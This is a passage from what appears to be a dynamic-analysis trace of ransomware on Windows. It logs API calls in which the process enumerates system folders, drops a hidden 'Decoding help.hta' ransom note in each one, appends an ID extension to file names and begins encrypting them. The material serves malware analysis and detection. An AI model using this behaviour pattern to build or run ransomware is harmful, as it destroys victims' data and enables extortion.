ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27e6af80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.861] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.861] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.861] FindNextFileW (in: hFindFile=0x5db8b8, lpFindFileData=0xe58fd30 | out: lpFindFileData=0xe58fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e6af80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29612a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29612a20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0056.861] lstrcmpW (lpString1=".", lpString2="Windows") returned -1 [0056.861] lstrcmpW (lpString1="..", lpString2="Windows") returned -1 [0056.861] lstrcmpiW (lpString1="windows", lpString2="Windows") returned 0 [0056.861] FindNextFileW (in: hFindFile=0x5db8b8, lpFindFileData=0xe58fd30 | out: lpFindFileData=0xe58fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e6af80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29612a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29612a20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0 [0056.861] FindClose (in: hFindFile=0x5db8b8 | out: hFindFile=0x5db8b8) returned 1 Thread: id = 673 os_tid = 0xecc [0054.454] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*.*", lpFindFileData=0x1361fd30 | out: lpFindFileData=0x1361fd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfc65d150, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xe5bc2f0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x2c0264d0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6716b0 [0059.152] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.152] FindNextFileW (in: hFindFile=0x6716b0, lpFindFileData=0x1361fd30 | out: lpFindFileData=0x1361fd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfc65d150, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0x2c0264d0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x2c0264d0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.611] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0059.611] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.611] FindNextFileW (in: hFindFile=0x6716b0, lpFindFileData=0x1361fd30 | out: lpFindFileData=0x1361fd30*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xfc767af0, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xfc767af0, ftLastAccessTime.dwHighDateTime=0x1d2dda1, ftLastWriteTime.dwLowDateTime=0xfc767af0, ftLastWriteTime.dwHighDateTime=0x1d2dda1, nFileSizeHigh=0x0, nFileSizeLow=0x2f, dwReserved0=0x0, dwReserved1=0x0, cFileName="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", cAlternateFileName="6D14E4~1")) returned 1 [0059.611] lstrcpyW (in: lpString1=0x33fa320, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*.*" [0059.611] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*.*") returned 52 [0059.611] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\Decoding help.hta" [0059.611] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\s-1-5-18\\decoding help.hta")) returned 0x2020 [0059.612] lstrcmpiW (lpString1="Decoding help.hta", lpString2="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 1 [0059.612] lstrlenW (lpString="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 69 [0059.612] lstrcmpiW (lpString1="[ID]", lpString2="e53f") returned -1 [0059.612] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*.*" [0059.612] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*.*") returned 52 [0059.612] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\", lpString2="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" [0059.612] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" [0059.612] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.[ID]g9uZrLhJaygpwRm1[ID]" [0059.612] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\s-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\s-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0060.894] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\s-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x92c [0060.895] CreateFileMappingA (hFile=0x92c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xdac [0060.895] CryptAcquireContextA (phProv=0x1361fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 674 os_tid = 0xed0 [0054.454] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*", lpFindFileData=0x13b1fd30 | out: lpFindFileData=0x13b1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2770 [0054.454] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0054.455] FindNextFileW (in: hFindFile=0x5e2770, lpFindFileData=0x13b1fd30 | out: lpFindFileData=0x13b1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.455] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0054.455] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0054.455] FindNextFileW (in: hFindFile=0x5e2770, lpFindFileData=0x13b1fd30 | out: lpFindFileData=0x13b1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c0af2f7, ftCreationTime.dwHighDateTime=0x1c9ea0e, ftLastAccessTime.dwLowDateTime=0x9c0af2f7, ftLastAccessTime.dwHighDateTime=0x1c9ea0e, ftLastWriteTime.dwLowDateTime=0x9c0af2f7, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1fad1, dwReserved0=0x0, dwReserved1=0x0, cFileName="background.png", cAlternateFileName="")) returned 1 [0054.455] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*" [0054.455] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*") returned 95 [0054.455] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\Decoding help.hta" [0054.455] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\decoding help.hta")) returned 0xffffffff [0054.455] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x578 [0056.945] WriteFile (in: hFile=0x578, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x13b1fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x13b1fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.480] CloseHandle (hObject=0x578) returned 1 [0058.480] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.480] lstrcmpiW (lpString1="Decoding help.hta", lpString2="background.png") returned 1 [0058.480] lstrlenW (lpString="background.png") returned 14 [0058.481] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*" [0058.481] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*") returned 95 [0058.481] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", lpString2="background.png" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png" [0058.481] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png" [0058.481] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png.[ID]g9uZrLhJaygpwRm1[ID]" [0058.481] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.481] FindNextFileW (in: hFindFile=0x5e2770, lpFindFileData=0x13b1fd30 | out: lpFindFileData=0x13b1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2feb941, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd2feb941, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x9c0d5455, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x769, dwReserved0=0x0, dwReserved1=0x0, cFileName="behavior.xml", cAlternateFileName="")) returned 1 [0058.481] lstrcpyW (in: lpString1=0x2a7a0418, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*" [0058.481] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*") returned 95 [0058.481] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\Decoding help.hta" [0058.481] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\decoding help.hta")) returned 0x1 [0058.481] lstrcmpiW (lpString1="Decoding help.hta", lpString2="behavior.xml") returned 1 [0058.481] lstrlenW (lpString="behavior.xml") returned 12 [0058.481] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*" [0058.481] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*") returned 95 [0058.481] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", lpString2="behavior.xml" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml" [0058.482] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml" [0058.482] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0058.482] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.482] FindNextFileW (in: hFindFile=0x5e2770, lpFindFileData=0x13b1fd30 | out: lpFindFileData=0x13b1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3011a9e, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd3011a9e, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x9c0d5455, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x70c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="watermark.png", cAlternateFileName="")) returned 1 [0058.482] lstrcpyW (in: lpString1=0x2a7a0418, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*" [0058.482] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*") returned 95 [0058.482] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\Decoding help.hta" [0058.482] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\decoding help.hta")) returned 0x1 [0058.482] lstrcmpiW (lpString1="Decoding help.hta", lpString2="watermark.png") returned -1 [0058.482] lstrlenW (lpString="watermark.png") returned 13 [0058.482] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*" [0058.482] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*") returned 95 [0058.482] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", lpString2="watermark.png" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png" [0058.482] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png" [0058.482] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png.[ID]g9uZrLhJaygpwRm1[ID]" [0058.482] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.482] FindNextFileW (in: hFindFile=0x5e2770, lpFindFileData=0x13b1fd30 | out: lpFindFileData=0x13b1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3011a9e, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd3011a9e, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x9c0d5455, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x70c1, dwReserved0=0x0, 